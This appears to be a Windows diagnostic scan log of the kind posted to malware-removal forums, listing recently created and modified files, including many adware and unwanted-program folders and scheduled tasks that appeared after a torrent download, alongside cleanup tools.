2015-12-29 16:02 - 2015-12-29 16:02 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsDatabase.dll
2015-12-29 15:54 - 2015-12-29 15:54 - 83947520 _____ C:\Windows\system32\config\SOFTWARE.iobit
2015-12-29 15:54 - 2015-12-29 15:54 - 00311296 _____ C:\Windows\system32\config\DEFAULT.iobit
2015-12-29 15:54 - 2015-12-29 15:54 - 00065536 _____ C:\Windows\system32\config\SAM.iobit
2015-12-29 15:54 - 2015-12-29 15:54 - 00028672 _____ C:\Windows\system32\config\SECURITY.iobit
2015-12-29 15:53 - 2015-12-29 16:27 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-29 15:52 - 2015-12-29 15:52 - 00002366 _____ C:\Windows\System32\Tasks\ASC8_SkipUac_hersheychoco9
2015-12-29 15:52 - 2015-12-29 15:52 - 00000250 _____ C:\Windows\Tasks\ASC8_SkipUac_hersheychoco9.job
2015-12-29 15:11 - 2015-12-29 15:11 - 00000000 _____ C:\Users\hersheychoco9\Desktop\sfcdetails.txt
2015-12-29 14:35 - 2015-12-29 14:35 - 00000000 ____D C:\Windows\pss
2015-12-29 03:32 - 2015-12-29 03:32 - 00000529 _____ C:\Users\hersheychoco9\Desktop\UsbFix.lnk
2015-12-29 03:32 - 2015-12-29 03:32 - 00000000 ____D C:\UsbFix
2015-12-29 01:12 - 2015-12-29 01:12 - 00009084 _____ C:\WirelessDiagLog.csv
2015-12-28 23:37 - 2015-12-28 23:37 - 00000000 ____D C:\Windows\system32\uopu
2015-12-28 23:31 - 2015-12-28 23:44 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Opera Software
2015-12-28 23:31 - 2015-12-28 23:44 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Opera Software
2015-12-28 23:29 - 2015-12-28 23:29 - 00004006 _____ C:\Windows\System32\Tasks\LaunchPreSignup
2015-12-28 23:29 - 2015-12-28 23:29 - 00003588 _____ C:\Windows\System32\Tasks\Only-search Updater
2015-12-28 23:29 - 2015-12-28 23:29 - 00000000 ____D C:\Program Files (x86)\onlysearch
2015-12-28 23:27 - 2015-12-29 16:00 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
2015-12-28 23:27 - 2015-12-28 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WajaNetEn
2015-12-28 23:27 - 2015-12-28 23:27 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032
2015-12-28 23:26 - 2015-12-28 23:34 - 00000883 _____ C:\Windows\SysWOW64\${LOGFILE}
2015-12-28 23:25 - 2015-12-28 23:25 - 00000000 ____D C:\ProgramData\62f92eec-4927-1
2015-12-28 23:25 - 2015-12-28 23:25 - 00000000 ____D C:\ProgramData\62f92eec-4791-0
2015-12-28 23:17 - 2015-12-28 23:17 - 00000000 ____D C:\Program Files (x86)\ExploreTech
2015-12-28 23:16 - 2015-12-28 23:16 - 00001520 _____ C:\ProgramData\tempimage.bmp
2015-12-28 23:09 - 2015-12-28 23:09 - 00023072 _____ C:\Windows\System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D}
2015-12-28 23:09 - 2015-12-28 23:09 - 00003304 _____ C:\Windows\System32\Tasks\IBUpd2
2015-12-28 23:09 - 2015-12-28 23:09 - 00000000 ____D C:\Program Files (x86)\PCAPDownloader
2015-12-28 23:08 - 2015-12-28 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\BrowserAir
2015-12-28 23:08 - 2015-12-28 23:08 - 00004784 _____ C:\Windows\SysWOW64\Comvud.ini
2015-12-28 23:08 - 2015-12-28 23:08 - 00003354 _____ C:\Windows\System32\Tasks\Ijufcyl
2015-12-28 23:08 - 2015-12-28 23:08 - 00002504 _____ C:\Windows\SysWOW64\ComvudOff.ini
2015-12-28 23:08 - 2015-12-28 23:08 - 00002504 _____ C:\Windows\system32\ComvudOff.ini
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\Users\hersheychoco9\AppData\LocalLow\Company
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\Users\hersheychoco9\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Tempfolder
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\uninst
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\ProgramData\33010bcc-5741-1
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\ProgramData\33010bcc-4455-0
2015-12-28 23:08 - 2015-12-28 22:01 - 00768368 _____ C:\Windows\system32\Comvud64.dll
2015-12-28 23:07 - 2015-12-29 06:00 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Seventh
2015-12-28 23:07 - 2015-12-28 23:07 - 00003522 _____ C:\Windows\System32\Tasks\Genius_Interval
2015-12-28 23:07 - 2015-12-28 23:07 - 00003304 _____ C:\Windows\System32\Tasks\Easy Driver Pro Schedule
2015-12-28 23:07 - 2015-12-28 23:07 - 00003208 _____ C:\Windows\System32\Tasks\Seventh
2015-12-28 23:07 - 2015-12-28 23:07 - 00003204 _____ C:\Windows\System32\Tasks\Genius
2015-12-28 23:07 - 2015-12-28 23:07 - 00003200 _____ C:\Windows\System32\Tasks\Sixth
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\Documents\Probit Software
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Sixth
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Genius
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\FunFeedr
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Common
2015-12-28 23:06 - 2015-12-29 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\Documents\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean
2015-12-28 23:05 - 2015-12-28 23:05 - 00000000 ____D C:\Windows\Update Pro
2015-12-28 23:05 - 2015-12-28 23:05 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DhcpUpdater
2015-12-28 23:04 - 2015-12-28 23:13 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\TrailerTime
2015-12-28 23:04 - 2015-12-28 23:04 - 00003214 _____ C:\Windows\System32\Tasks\Pool Component
2015-12-28 23:04 - 2015-12-28 23:04 - 00003204 _____ C:\Windows\System32\Tasks\Pool Component2
2015-12-28 23:04 - 2015-12-28 23:04 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Pool Component
2015-12-28 23:04 - 2015-12-28 23:04 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032
2015-12-28 23:03 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files\WajaNetEn
2015-12-28 23:02 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\Probit Software
2015-12-28 23:02 - 2015-12-28 23:30 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\WTools
2015-12-28 23:02 - 2015-12-28 23:26 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Store
2015-12-28 23:01 - 2015-12-28 23:34 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Nosibay
2015-12-28 23:00 - 2015-12-29 06:00 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\NUIns
2015-12-28 23:00 - 2015-12-28 23:00 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032
2015-12-28 22:57 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\sushileads
2015-12-28 22:57 - 2015-12-28 22:57 - 00009216 _____ C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
2015-12-28 22:57 - 2015-12-28 22:57 - 00003534 _____ C:\Windows\System32\Tasks\SushiLeads
2015-12-28 22:57 - 2015-12-28 22:57 - 00002560 _____ C:\Users\hersheychoco9\AppData\Local\uninstall.exe
2015-12-28 22:55 - 2015-12-28 22:55 - 02669034 _____ C:\Users\hersheychoco9\Downloads\The+Men+of+Yoshiwara+Kiku.zip
2015-12-28 22:29 - 2015-12-28 22:29 - 00271609 _____ C:\Users\hersheychoco9\Downloads\[kat.cr]the.men.of.yoshiwara.kikuya.gyakuten.yoshiwara.visual.novel.english.torrent
2015-12-28 22:28 - 2015-10-29 14:02 - 00000015 _____ C:\Users\hersheychoco9\Downloads\USE PASSWORD - 12345.txt
2015-12-21 23:44 - 2015-12-21 23:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-12-20 02:01 - 2015-12-20 02:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bluetooth Devices
2015-12-10 19:26 - 2014-03-06 03:22 - 00134144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2015-12-10 19:25 - 2014-03-06 03:24 - 00111616 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\hidclass.sys
2015-12-10 19:25 - 2014-03-06 03:24 - 00033280 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\hidusb.sys
2015-12-10 19:25 - 2014-03-06 03:19 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2015-12-09 13:49 - 2015-12-01 11:19 - 00826872 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-09 13:49 - 2015-12-01 11:19 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-09 13:37 - 2015-12-09 13:38 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-12-09 13:30 - 2015-11-22 00:59 - 07455064 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-12-09 13:30 - 2015-11-22 00:59 - 01735000 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2015-12-09 13:30 - 2015-11-22 00:59 - 01659568 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2015-12-09 13:30 - 2015-11-22 00:59 - 01519592 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2015-12-09 13:30 - 2015-11-22 00:59 - 01487008 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2015-12-09 13:30 - 2015-11-22 00:59 - 01355848 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2015-12-09 13:30 - 2015-11-22 00:58 - 01499920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2015-12-09 13:30 - 2015-11-21 12:32 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-12-09 13:30 - 2015-11-21 11:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2015-12-09 13:30 - 2015-11-21 10:59 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2015-12-09 13:30 - 2015-11-21 10:49 - 01344000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2015-12-09 13:30 - 2015-11-21 10:47 - 00522240 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2015-12-09 13:30 - 2015-11-21 10:40 - 00414208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2015-12-09 13:30 - 2015-11-11 10:21 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-12-09 13:30 - 2015-11-11 10:00 - 12856832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-12-09 13:30 - 2015-11-11 09:44 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-12-09 13:30 - 2015-11-11 09:44 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2015-12-09 13:30 - 2015-11-11 09:41 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-12-09 13:30 - 2015-11-11 09:12 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-12-09 13:30 - 2015-11-09 18:13 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-12-09 13:30 - 2015-11-09 18:11 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-12-09 13:30 - 2015-11-09 18:08 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-12-09 13:30 - 2015-11-09 18:04 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-12-09 13:30 - 2015-11-09 18:02 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-12-09 13:30 - 2015-11-09 17:46 - 04514816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-12-09 13:30 - 2015-11-09 17:41 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2015-12-09 13:30 - 2015-11-09 17:37 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2015-12-09 13:30 - 2015-11-09 17:36 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-12-09 13:30 - 2015-11-09 17:36 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-12-09 13:30 - 2015-11-09 17:36 - 00325632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-12-09 13:30 - 2015-11-09 17:25 - 01048576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
2015-12-09 13:30 - 2015-11-09 17:17 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-12-09 13:30 - 2015-11-09 17:14 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-12-09 13:30 - 2015-11-09 17:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-12-09 13:30 - 2015-11-08 18:41 - 01540728 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2015-12-09 13:30 - 2015-11-08 16:30 - 04176384 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-12-09 13:30 - 2015-11-08 16:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-12-09 13:30 - 2015-11-08 16:15 - 00571392 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-12-09 13:30 - 2015-11-08 16:04 - 05923840 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-12-09 13:30 - 2015-11-08 16:02 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-12-09 13:30 - 2015-11-08 16:01 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-12-09 13:30 - 2015-11-08 15:32 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-12-09 13:30 - 2015-11-08 15:32 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2015-12-09 13:30 - 2015-11-08 15:25 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2015-12-09 13:30 - 2015-11-08 15:23 - 01994752 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-12-09 13:30 - 2015-11-08 15:18 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2015-12-09 13:30 - 2015-11-08 15:16 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-12-09 13:30 - 2015-11-08 15:15 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-12-09 13:30 - 2015-11-08 15:15 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-12-09 13:30 - 2015-11-08 15:14 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-12-09 13:30 - 2015-11-08 15:13 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-12-09 13:30 - 2015-11-08 15:13 - 01383936 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-12-09 13:30 - 2015-11-08 15:01 - 01753600 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2015-12-09 13:30 - 2015-11-08 14:53 - 02880000 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2015-12-09 13:30 - 2015-11-08 14:53 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-12-09 13:30 - 2015-11-08 14:52 - 01559552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-12-09 13:30 - 2015-11-08 14:48 - 01376256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2015-12-09 13:30 - 2015-11-08 14:42 - 01490944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2015-12-09 13:30 - 2015-11-08 14:41 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-12-09 13:30 - 2015-11-08 14:30 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-12-09 13:30 - 2015-11-05 02:59 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2015-12-09 13:29 - 2015-11-20 16:47 - 00136904 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-12-09 13:29 - 2015-11-20 12:18 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-12-09 13:29 - 2015-11-20 10:58 - 03706880 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-12-09 13:29 - 2015-11-20 10:47 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-12-09 13:29 - 2015-11-20 10:46 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-12-09 13:29 - 2015-11-20 10:44 - 00409088 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll
2015-12-09 13:29 - 2015-11-20 10:44 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-12-09 13:29 - 2015-11-20 10:43 - 00897024 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-12-09 13:29 - 2015-11-20 10:42 - 02243584 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-12-09 13:29 - 2015-11-20 10:30 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-12-09 13:29 - 2015-11-20 10:29 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-12-09 13:29 - 2015-11-20 10:28 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-12-09 13:29 - 2015-11-20 10:27 - 00726528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-12-09 13:29 - 2015-10-28 09:49 - 02775552 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2015-12-09 13:29 - 2015-10-28 09:29 - 02462720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2015-12-06 00:57 - 2015-07-30 08:04 - 00124624 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-12-06 00:57 - 2015-07-30 07:48 - 00103120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll

 

[hersheychoco]

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-05 17:08 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS
2016-01-05 17:06 - 2013-08-22 09:20 - 00000000 ____D C:\Windows\CbsTemp
2016-01-05 17:05 - 2014-11-21 23:28 - 00000930 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-05 16:56 - 2014-05-13 21:39 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2016-01-05 16:54 - 2014-05-13 21:18 - 00865408 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-05 16:54 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\Inf
2016-01-05 16:51 - 2015-03-11 08:30 - 00000000 ___DO C:\Users\hersheychoco9\OneDrive
2016-01-05 16:50 - 2015-09-21 21:29 - 00000000 ____D C:\ProgramData\ProductData
2016-01-05 16:50 - 2014-11-21 23:28 - 00000926 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-05 16:49 - 2014-10-10 07:49 - 00000318 _____ C:\Windows\system32\ayboot.ini
2016-01-05 16:48 - 2013-08-22 08:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-29 17:16 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\NDF
2015-12-29 17:12 - 2014-05-13 20:56 - 00000000 ____D C:\Windows\Panther
2015-12-29 17:06 - 2013-08-22 09:36 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2015-12-29 17:01 - 2014-10-10 05:14 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1030869394-3123877279-975090705-1001
2015-12-29 16:42 - 2014-10-10 08:41 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-29 15:59 - 2015-01-03 03:31 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Azureus
2015-12-29 15:49 - 2014-10-16 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\PCDr
2015-12-29 14:14 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\Registration
2015-12-29 02:25 - 2014-11-21 18:42 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Adobe
2015-12-29 01:15 - 2014-10-10 05:40 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\ElevatedDiagnostics
2015-12-29 00:33 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\LocalLow\EmieUserList
2015-12-29 00:33 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\LocalLow\EmieSiteList
2015-12-29 00:23 - 2015-09-21 21:29 - 00000318 _____ C:\Windows\Tasks\Uninstaller_SkipUac_hersheychoco9.job
2015-12-29 00:20 - 2015-09-21 21:29 - 00002434 _____ C:\Windows\System32\Tasks\Uninstaller_SkipUac_hersheychoco9
2015-12-28 23:43 - 2015-12-05 21:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2015-12-28 23:38 - 2013-08-22 08:44 - 05011720 _____ C:\Windows\system32\FNTCACHE.DAT
2015-12-28 23:36 - 2014-10-08 11:14 - 00000000 ____D C:\Users\hersheychoco9
2015-12-28 23:34 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\Local\EmieUserList
2015-12-28 23:34 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\Local\EmieSiteList
2015-12-28 23:27 - 2013-08-22 07:25 - 00000226 _____ C:\Windows\win.ini
2015-12-28 23:14 - 2014-11-21 23:29 - 00002419 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-28 23:08 - 2014-10-08 11:15 - 00001628 _____ C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-12-28 22:29 - 2015-01-03 03:31 - 00000000 ____D C:\Users\hersheychoco9\Documents\Vuze Downloads
2015-12-28 22:28 - 2015-01-03 03:31 - 00000000 ____D C:\Program Files\Vuze
2015-12-28 19:33 - 2014-10-19 20:11 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Skype
2015-12-25 20:51 - 2015-05-14 19:14 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Curse Client
2015-12-23 23:38 - 2015-02-18 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Steam
2015-12-21 23:44 - 2015-08-22 10:12 - 00002713 _____ C:\Users\Public\Desktop\Skype.lnk
2015-12-21 23:44 - 2014-10-19 20:11 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-21 23:44 - 2014-10-19 20:11 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Skype
2015-12-21 23:44 - 2014-10-19 20:10 - 00000000 ____D C:\ProgramData\Skype
2015-12-20 01:43 - 2015-05-01 20:00 - 00000132 _____ C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
2015-12-20 00:44 - 2013-08-22 07:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2015-12-17 20:08 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\rescache
2015-12-13 19:52 - 2014-05-13 21:21 - 00000000 ____D C:\ProgramData\Dell
2015-12-09 13:38 - 2013-08-22 13:12 - 00000000 ____D C:\Program Files\Windows Journal
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ___SD C:\Windows\system32\dsc
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ___RD C:\Windows\ToastData
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\WinStore
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\setup
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\migwiz
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\Com
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\setup
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\SecureBootUpdates
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\migwiz
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\Com
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\MediaViewer
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\IME
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\FileManager
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\Camera
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Portable Devices
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Common Files\System
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\SysWOW64\oobe
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\SysWOW64\Dism
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\Sysprep
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\oobe
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\Dism
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\servicing
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\InputMethod
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-12-09 13:34 - 2015-12-05 23:20 - 00000000 ____D C:\Windows\system32\MRT
2015-12-09 13:27 - 2015-12-05 23:20 - 140158008 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Files in the root of some directories =======

2014-10-10 07:45 - 2014-10-09 17:10 - 27674200 _____ () C:\Program Files (x86)\Roboscan_IS_Free.exe
2015-05-01 20:00 - 2015-12-20 01:43 - 0000132 _____ () C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
